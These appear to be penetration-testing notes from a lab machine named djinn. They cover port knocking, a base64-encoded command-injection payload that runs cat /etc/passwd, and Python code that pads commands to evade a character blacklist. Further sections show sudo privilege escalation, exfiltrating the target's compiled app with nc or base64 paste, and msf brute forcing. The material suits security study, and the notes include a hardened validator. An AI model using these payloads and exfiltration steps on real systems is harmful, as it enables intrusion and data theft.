This article was last modified 184 days ago; parts of it may be out of date. Ask the author if in doubt.

Port knocking
knock 192.168.5.130 1356 6784 3409
After the knock sequence, a second nmap scan shows the previously hidden port as open.
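What the knock command does, written out as an added example (not code from the original notes): one TCP connection attempt per port, in order, then a check of the protected port. The host and the knock sequence are the ones from the page; the protected port (2222 here) is an assumption, the page does not say which port nmap showed as newly open. The FakeKnockDaemon is an offline stand-in for knockd so the ordering logic can be exercised without the lab VM.

```python
import socket
import time


def tcp_probe(host, port, timeout=0.5):
    """One TCP connection attempt; True if the port accepted it.

    A knock daemon only needs to see the SYN, so a refused or timed-out
    connection still counts as a knock. Failures here are expected.
    """
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:
        return False


def knock(host, sequence, probe=tcp_probe, delay=0.2):
    """Hit each port in `sequence` in order, pausing between knocks.

    Returns [(port, accepted), ...] in the order sent. `probe` is injectable
    so the logic can run without a network.
    """
    results = []
    for port in sequence:
        results.append((port, probe(host, port)))
        time.sleep(delay)
    return results


def knock_and_check(host, sequence, target_port, probe=tcp_probe, delay=0.2):
    """Probe the protected port, knock, probe again; report whether it opened."""
    before = probe(host, target_port)
    knock(host, sequence, probe=probe, delay=delay)
    after = probe(host, target_port)
    return {"before": before, "after": after, "opened": (not before) and after}


class FakeKnockDaemon:
    """Offline model of knockd: the protected port opens only after the exact
    sequence has been seen in order. Knock ports themselves never accept."""

    def __init__(self, sequence, protected_port):
        self.sequence = list(sequence)
        self.protected_port = protected_port
        self.seen = []
        self.is_open = False

    def __call__(self, host, port, timeout=0.5):
        if port == self.protected_port:
            return self.is_open
        self.seen.append(port)
        if self.seen[-len(self.sequence):] == self.sequence:
            self.is_open = True
        return False


if __name__ == "__main__":
    # Host and sequence from the page; 2222 as the protected port is an assumption.
    print(knock_and_check("192.168.5.130", [1356, 6784, 3409], 2222))
```

Order matters: the same three ports sent in a different order leave the port closed, which is why a stray port scan in the middle of a knock sequence usually resets it.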

[image: this website shows the security-software processes (Huorong and the like) running on the target]
[image: reverse lookup of the IP to find the domains hosted on it]
Use Burp Suite to work out which characters the input filter blacklists

| pipes the output of the previous command into the next one.
echo "Y2F0IC9ldGMvcGFzc3dkCg=="|base64 -d|bash
If the filter blacklists certain characters, base64-encode the whole command (here cat /etc/passwd) so that the payload contains none of them, and let the target decode it.
|bash runs the decoded text as a shell command. Without it, base64 -d only prints the text "cat /etc/passwd" back; nothing is executed.
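The bypass as an added example (not code from the original notes or from the target application). The blacklist is an assumption: the page says the characters were found with Burp Suite but never lists them, so BLACKLIST below is illustrative and should be replaced with whatever the target actually rejects. The example also handles the case the notes do not: the base64 alphabet contains '/', '+' and '=' itself, so if those are blacklisted the command is padded with spaces until an encoding without them exists. hardened_validate shows the actual fix on the server side.

```python
import base64
import shlex

# Illustrative blacklist (assumption, not the target's real list).
BLACKLIST = set("/.?*^$;")


def passes_filter(cmd, blacklist=BLACKLIST):
    """Model of a character blacklist: reject if any forbidden character appears."""
    return not any(ch in blacklist for ch in cmd)


def build_b64_payload(cmd, blacklist=BLACKLIST):
    """Wrap cmd as `echo <b64>|base64 -d|bash` so the forbidden characters only
    exist inside the base64 text.

    Leading spaces re-align every 3-byte group (changes all output characters,
    can remove a '/' or '+'); trailing spaces change how much '=' padding the
    final group needs. Spaces are harmless to the shell. Returns None if no
    variant passes the filter.
    """
    for lead in range(3):
        for trail in range(3):
            plain = " " * lead + cmd + " " * trail + "\n"
            b64 = base64.b64encode(plain.encode()).decode("ascii")
            payload = "echo %s|base64 -d|bash" % b64
            if passes_filter(payload, blacklist):
                return payload
    return None


def decode_payload(payload):
    """What bash on the target actually runs once the payload is decoded."""
    b64 = payload.split(" ", 1)[1].split("|", 1)[0]
    return base64.b64decode(b64).decode().strip()


def hardened_validate(cmd, allowed=("id", "whoami", "uptime")):
    """The fix is not a longer blacklist: parse the input as argv, accept only an
    allow-listed program, and run it with subprocess and shell=False."""
    try:
        argv = shlex.split(cmd)
    except ValueError:
        return None
    if not argv or argv[0] not in allowed:
        return None
    return argv


if __name__ == "__main__":
    raw = "cat /etc/passwd"
    print(passes_filter(raw), build_b64_payload(raw))
    print(build_b64_payload(raw, BLACKLIST | {"=", "+", "/"}))
```

For cat /etc/passwd the first variant already passes and is exactly the echo "Y2F0IC9ldGMvcGFzc3dkCg==" pipeline from the notes; with '=' added to the blacklist the padding loop picks a longer command whose encoding needs no '='.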

In nitish's shell, sudo -l gives:
User nitish may run the following commands on djinn:

(sam) NOPASSWD: /usr/bin/genie

Meaning: nitish may run /usr/bin/genie as the user sam, with no password prompt.

/etc/passwd: one line per user; the last field of each line is the user's login shell. nologin (or /bin/false) means the account cannot log in interactively.
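A small parser for the format, as an added example (not from the original notes). The sample passwd text is constructed for the example; the user names nitish and sam are from the page, their uids and home directories are made up.

```python
# Constructed sample; uids/homes are made up for the example.
PASSWD_SAMPLE = """root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
nitish:x:1000:1000:nitish:/home/nitish:/bin/bash
sam:x:1001:1001::/home/sam:/bin/bash
"""

NON_LOGIN_SHELLS = {"/usr/sbin/nologin", "/sbin/nologin", "/bin/false", "/usr/bin/false"}


def parse_passwd(text):
    """Split each passwd line into its seven fields and flag interactive accounts."""
    users = []
    for line in text.splitlines():
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            continue  # malformed line, skip rather than guess
        name, _pw, uid, gid, _gecos, home, shell = fields
        users.append({
            "name": name,
            "uid": int(uid),
            "gid": int(gid),
            "home": home,
            "shell": shell,
            "can_login": shell not in NON_LOGIN_SHELLS,
        })
    return users


def interactive_users(text):
    """Accounts that can actually get a shell: the candidates for su / sudo -u."""
    return [u["name"] for u in parse_passwd(text) if u["can_login"]]


def uid0_accounts(text):
    """Any account with uid 0 is root regardless of its name; more than one is a finding."""
    return [u["name"] for u in parse_passwd(text) if u["uid"] == 0]


if __name__ == "__main__":
    print(interactive_users(PASSWD_SAMPLE), uid0_accounts(PASSWD_SAMPLE))
```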

useradd -d /home/sam -m sam   add a user (-d sets the home directory, -m creates it)

sudo -u sam id   run id as sam
su <username>   switch user

To pull an already-compiled .pyc file back to the attacking machine there are two ways: transfer it over an nc connection, or base64-encode it and copy-paste the text.
The base64 method:
base64 app.pyc
A/MNCgYZzF1jAAAAAAAAAAAIAAAAQAAAAHMIAQAAZAAAZAEAbAAAWgAAZAAAZAIAbAEAbQIAWgIA
bQMAWgMAbQQAWgQAbQUAWgUAbQYAWgYAAWUCAGUHAIMBAFoIAGQDAGUIAF8JAGQEAFoKAGQFAGQG
AGQHAGQIAGQJAGQKAGQLAGQMAGcIAFoLAGQNAIQAAFoMAGUIAGoNAGQFAGQOAGQPAGcBAIMBAWQQ
AIQAAIMBAFoOAGUIAGoNAGQRAGQOAGQSAGQPAGcCAIMBAWQTAIQAAIMBAFoPAGUIAGoNAGQUAGQO
AGQPAGQSAGcCAIMBAWQVAIQAAIMBAFoQAGUHAGQWAGsCAHIEAWUIAGoRAGQXAGQYAGQZAGUSAIMA
AgFuAABkAQBTKBoAAABp/04oBQAAAHQFAAAARmxhc2t0CAAAAHJlZGlyZWN0dA8AAAByZW5k
ZXJfdGVtcGxhdGV0BwAAAHJlcXVlc3R0BwAAAHVybF9mb3J0AwAAAGtleXMbAAAAL2hvbWUvbml0
aXNoLy5kZXYvY3JlZHMudHh0dAEAAAAvdAEAAAAudAEAAAA/dAEAAAAqdAEAAABedAEAAAAkdAQA
AABldmFsdAEAAAA7YwEAAAADAAAABQAAAEMAAABzbwAAAHQAAHwAAGsGAHIcAGQBAHwAAGsHAHIc
AHQBAFN5OgB4LwB0AgBEXScAfQEAeB4AfAAARF0WAH0CAHwBAHwCAGsCAHIzAHQDAFNxMwBXcSYA
V3QBAFNXbhIABHQEAGsKAHJqAAEBAXQDAFNYZAAAUygCAAAATnQDAAAAY2F0KAUAAAB0BQAAAENS
RURTdAQAAABUcnVldAMAAABSQ0V0BQAAAEZhbHNldAkAAABFeGNlcHRpb24oAwAAAHQDAAAAY21k
dAEAAABpdAEAAABqKAAAAAAoAAAAAHMOAAAAL29wdC84MC9hcHAucHl0CAAAAHZhbGlkYXRlDQAA
AHMUAAAAAAEYAQQCAwENAQ0BDAEMAQgBDQF0BwAAAG1ldGhvZHN0AwAAAEdFVGMAAAAAAAAAAAIA
AABDAAAAcwoAAAB0AABkAQCDAQBTKAIAAABOcwkAAABtYWluLmh0bWwoAQAAAFICAAAAKAAAAAAo
AAAAACgAAAAAcw4AAAAvb3B0LzgwL2FwcC5weXQFAAAAaW5kZXgbAAAAcwIAAAAAAnMFAAAAL3dp
c2h0BAAAAFBPU1RjAAAAAAIAAAAGAAAAQwAAAHN4AAAAdAAAagEAagIAZAEAgwEAfQAAfAAAcmoA
dAMAfAAAgwEAck4AdAQAagUAfAAAZAIAdAYAZAMAdAQAagcAgwECaggAagkAgwAAfQEAbgYAZAQA
fQEAdAoAdAsAZAUAZAYAfAEAgwEBgwEAU3QMAGQHAIMBAFNkAABTKAgAAABOUhQAAAB0BQAAAHNo
ZWxsdAYAAABzdGRvdXRzFQAAAFdyb25nIGNob2ljZSBvZiB3b3Jkc3QFAAAAZ2VuaWV0BAAAAG5h
bWVzCQAAAHdpc2guaHRtbCgNAAAAUgMAAAB0BAAAAGZvcm10AwAAAGdldFIXAAAAdAoAAABzdWJw
cm9jZXNzdAUAAABQb3BlblIQAAAAdAQAAABQSVBFUh0AAAB0BAAAAHJlYWRSAQAAAFIEAAAAUgIA
AAAoAgAAAHQHAAAAZXhlY3V0ZXQGAAAAb3V0cHV0KAAAAAAoAAAAAHMOAAAAL29wdC84MC9hcHAu
cHl0BAAAAHdpc2ggAAAAcxAAAAAAAhIBBgEMARIBGAIGAhYCcwYAAAAvZ2VuaWVjAAAAAAEAAAAE
AAAAQwAAAHM6AAAAZAEAdAAAagEAawYAciQAdAAAagEAagIAZAEAgwEAfQAAbgYAZAIAfQAAdAMA
ZAMAZAQAfAAAgwEBUygFAAAATlIfAAAAcxIAAABJdCdzIG5vdCB0aGF0IGhhcmRzCgAAAGdlbmll
Lmh0bWx0BAAAAGZpbGUoBAAAAFIDAAAAdAQAAABhcmdzUiEAAABSAgAAACgBAAAAdAQAAABwYWdl
KAAAAAAoAAAAAHMOAAAAL29wdC84MC9hcHAucHlSHgAAAC8AAABzCAAAAAACDwEVAgYCdAgAAABf
X21haW5fX3QEAAAAaG9zdHMHAAAAMC4wLjAuMHQFAAAAZGVidWcoEwAAAFIiAAAAdAUAAABmbGFz
a1IAAAAAUgEAAABSAgAAAFIDAAAAUgQAAAB0CAAAAF9fbmFtZV9fdAMAAABhcHB0CgAAAHNlY3Jl
dF9rZXlSDwAAAFIRAAAAUhcAAAB0BQAAAHJvdXRlUhoAAABSKAAAAFIeAAAAdAMAAABydW5SEAAA
ACgAAAAAKAAAAAAoAAAAAHMOAAAAL29wdC84MC9hcHAucHl0CAAAADxtb2R1bGU+AQAAAHMWAAAA
DAIoAgwBCQIGAh4DCQ4hBSQPJAoMAQ==
This prints a long block of text.
Copy it, then on Kali: vim app64, paste, save.
base64 -d app64 > app.pyc
Use > rather than >>: >> appends, so if an app.pyc already exists the result is a corrupted file. Compare md5sum or sha256sum of the file on both sides before trying to decompile it.

The nc method: on Kali, listen on a port and write whatever arrives to a file: nc -lvnp 7777 > 111.pyc
On the target: nc <kali-ip> 7777 < 111.pyc
Some nc builds do not exit at EOF; close the sender with Ctrl-C once the transfer stops, then compare the hash on both sides.
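The integrity side of both transfer methods (base64 paste and nc), as an added example that is not part of the original notes: encode for pasting, strip the whitespace the editor and clipboard add, decode strictly, and compare hashes. The sample .pyc bytes are constructed (a Python 2.7 magic header followed by filler, not a real code object). The check for the 2.7 magic is there because the page's own dump starts with A/MNCg, which decodes to 03 f3 0d 0a, the CPython 2.7 .pyc magic, so a decompiler for that version is needed.

```python
import base64
import hashlib
import textwrap

PY27_MAGIC = b"\x03\xf3\x0d\x0a"  # first four bytes of a CPython 2.7 .pyc

# Constructed sample: magic + 4-byte mtime + filler, not a real code object.
SAMPLE_PYC = PY27_MAGIC + b"\x00\x00\x00\x00" + b"c" + bytes(range(256))


def encode_for_paste(data, width=76):
    """Base64 the file and wrap it so a terminal/editor paste survives intact."""
    b64 = base64.b64encode(data).decode("ascii")
    return "\n".join(textwrap.wrap(b64, width)) + "\n"


def decode_pasted(text):
    """Reverse of the paste: drop all whitespace (newlines from the editor,
    stray spaces from the clipboard) and decode strictly so any corruption
    raises instead of producing a silently truncated file."""
    cleaned = "".join(text.split())
    return base64.b64decode(cleaned, validate=True)


def sha256hex(data):
    """Same value as sha256sum on either side; compare before decompiling."""
    return hashlib.sha256(data).hexdigest()


def looks_like_py27_pyc(data):
    """Only the 2.7 magic is checked here; other versions have other values."""
    return data[:4] == PY27_MAGIC


def transfer_roundtrip(data):
    """Simulate dump -> paste -> decode and report whether the bytes survived."""
    restored = decode_pasted(encode_for_paste(data))
    return {
        "ok": sha256hex(restored) == sha256hex(data),
        "bytes": len(restored),
        "py27": looks_like_py27_pyc(restored),
    }


if __name__ == "__main__":
    print(transfer_roundtrip(SAMPLE_PYC))
    # The page's dump starts with this line fragment.
    print(decode_pasted("A/MNCgYZzF1j")[:4].hex())
```

For the nc transfer the same sha256hex comparison applies: run sha256sum on 111.pyc on both hosts, because a listener closed early gives a short file with no error message.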

Brute forcing with msf

In meterpreter, show_mount lists the target's drives and mount points
service apache2 start, then everything under /var/www/html on Kali is served over HTTP
